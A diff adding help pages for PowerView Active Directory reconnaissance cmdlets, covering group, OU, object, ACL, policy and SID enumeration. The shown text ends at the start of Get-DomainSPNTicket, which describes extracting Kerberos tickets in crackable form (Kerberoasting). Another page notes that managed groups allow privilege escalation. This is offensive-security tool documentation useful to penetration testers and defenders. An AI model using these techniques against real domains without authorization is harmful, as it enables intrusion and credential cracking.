+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GroupMember
+
+Custom PSObject with translated group member property fields.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/](http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/)
+
diff --git a/docs/Recon/Get-DomainManagedSecurityGroup.md b/docs/Recon/Get-DomainManagedSecurityGroup.md
new file mode 100755
index 0000000..13d48a2
--- /dev/null
+++ b/docs/Recon/Get-DomainManagedSecurityGroup.md
@@ -0,0 +1,177 @@
+# Get-DomainManagedSecurityGroup
+
+## SYNOPSIS
+Returns all security groups in the current (or target) domain that have a manager set.
+
+Author: Stuart Morgan (@ukstufus) \<stuart.morgan@mwrinfosecurity.com\>, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl
+
+## SYNTAX
+
+```
+Get-DomainManagedSecurityGroup [[-Domain] <String>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Authority to manipulate the group membership of AD security groups and distribution groups
+can be delegated to non-administrators by setting the 'managedBy' attribute.
+This is typically
+used to delegate management authority to distribution groups, but Windows supports security groups
+being managed in the same way.
+
+This function searches for AD groups which have a group manager set, and determines whether that
+user can manipulate group membership.
+This could be a useful method of horizontal privilege
+escalation, especially if the manager can manipulate the membership of a privileged group.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv
+```
+
+Store a list of all security groups with managers in group-managers.csv
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ManagedSecurityGroup
+
+A custom PSObject describing the managed security group.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainOU.md b/docs/Recon/Get-DomainOU.md
new file mode 100755
index 0000000..cc1fd39
--- /dev/null
+++ b/docs/Recon/Get-DomainOU.md
@@ -0,0 +1,316 @@
+# Get-DomainOU
+
+## SYNOPSIS
+Search for all organization units (OUs) or specific OU objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainOU [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties whencreated,usnchanged,...".
+By default, all OU objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainOU
+```
+
+Returns the current OUs in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainOU *admin* -Domain testlab.local
+```
+
+Returns all OUs with "admin" in their name in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+```
+
+Returns all OUs with linked to the specified group policy object.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+"*admin*","*server*" | Get-DomainOU
+```
+
+Search for OUs with the specific names.
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainOU -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+An OU name (e.g.
+TestOU), DistinguishedName (e.g.
+OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g.
+8a9ba22a-8977-47e6-84ce-8c26af4e1e6a).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -GPLink
+Only return OUs with the specified GUID in their gplink property.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: GUID
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.OU
+
+Custom PSObject with translated OU property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainObject.md b/docs/Recon/Get-DomainObject.md
new file mode 100755
index 0000000..f900c53
--- /dev/null
+++ b/docs/Recon/Get-DomainObject.md
@@ -0,0 +1,318 @@
+# Get-DomainObject
+
+## SYNOPSIS
+Return all (or specified) domain objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName
+
+## SYNTAX
+
+```
+Get-DomainObject [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
+ [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainObject -Domain testlab.local
+```
+
+Return all objects for the testlab.local domain
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname
+```
+
+distinguishedname
+-----------------
+CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local
+CN=dfm,CN=Users,DC=testlab,DC=local
+OU=OU3,DC=testlab,DC=local
+CN=dfm (admin),CN=Users,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObject -Credential $Cred -Identity 'windows1'
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainUser\] Extracted domain 'testlab.local' from 'testlab\harmj0y'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+
+distinguishedname
+-----------------
+CN=harmj0y,CN=Users,DC=testlab,DC=local
+VERBOSE: \[Get-DomainUser\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins)))
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ADObject
+
+Custom PSObject with translated AD object property fields.
+
+PowerView.ADObject.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainObjectAcl.md b/docs/Recon/Get-DomainObjectAcl.md
new file mode 100755
index 0000000..97f70cd
--- /dev/null
+++ b/docs/Recon/Get-DomainObjectAcl.md
@@ -0,0 +1,251 @@
+# Get-DomainObjectAcl
+
+## SYNOPSIS
+Returns the ACLs associated with a specific active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap
+
+## SYNTAX
+
+```
+Get-DomainObjectAcl [[-Identity] <String[]>] [-ResolveGUIDs] [-RightsFilter <String>] [-Domain <String>]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs
+```
+
+Get the ACLs for the matt.admin user in the testlab.local domain and
+resolve relevant GUIDs to their display names.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs
+```
+
+Enumerate the ACL permissions for all OUs in the domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ResolveGUIDs
+Switch.
+Resolve GUIDs to their display names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RightsFilter
+A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Rights
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ACL
+
+Custom PSObject with ACL entries.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainPolicy.md b/docs/Recon/Get-DomainPolicy.md
new file mode 100755
index 0000000..8b7d157
--- /dev/null
+++ b/docs/Recon/Get-DomainPolicy.md
@@ -0,0 +1,159 @@
+# Get-DomainPolicy
+
+## SYNOPSIS
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-DomainPolicy [[-Domain] <String>] [-Source <String>] [-Server <String>] [-ServerTimeLimit <Int32>]
+ [-ResolveSids] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller using Get-DomainGPO.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainPolicy
+```
+
+Returns the domain policy for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainPolicy -Domain dev.testlab.local
+```
+
+Returns the domain policy for the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainPolicy -Source DC -Domain dev.testlab.local
+```
+
+Returns the policy for the dev.testlab.local domain controller.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainPolicy -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+The domain to query for default policies, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Source
+Extract 'Domain' or 'DC' (domain controller) policies.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Domain
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResolveSids
+Switch.
+Resolve Sids from a DC policy to object names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### Hashtable
+
+Ouputs a hashtable representing the parsed GptTmpl.inf file.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainSID.md b/docs/Recon/Get-DomainSID.md
new file mode 100755
index 0000000..16c51ce
--- /dev/null
+++ b/docs/Recon/Get-DomainSID.md
@@ -0,0 +1,102 @@
+# Get-DomainSID
+
+## SYNOPSIS
+Returns the SID for the current domain or the specified domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer
+
+## SYNTAX
+
+```
+Get-DomainSID [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Returns the SID for the current domain or the specified domain by executing
+Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)
+to search for domain controllers through LDAP.
+The SID of the returned domain controller
+is then extracted.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSID
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainSID -Domain testlab.local
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSID -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### String
+
+A string representing the specified domain SID.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainSPNTicket.md b/docs/Recon/Get-DomainSPNTicket.md
new file mode 100755
index 0000000..70385a4
--- /dev/null
+++ b/docs/Recon/Get-DomainSPNTicket.md
@@ -0,0 +1,136 @@
+# Get-DomainSPNTicket
+
+## SYNOPSIS
+Request the kerberos ticket for a specified service principal name (SPN).
+
+Author: machosec, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+### RawSPN (Default)
+```
+Get-DomainSPNTicket [-SPN] <String[]> [-OutputFormat <String>] [-Credential <PSCredential>]
+```
+
+### User
+```
+Get-DomainSPNTicket [-User] <Object[]> [-OutputFormat <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will either take one/more SPN strings, or one/more PowerView.User objects
+(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN
+using System.IdentityModel.Tokens.KerberosRequestorSecurityToken.
+The encrypted
+portion of the ticket is then extracted and output in either crackable John or Hashcat
+format (deafult of John).
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
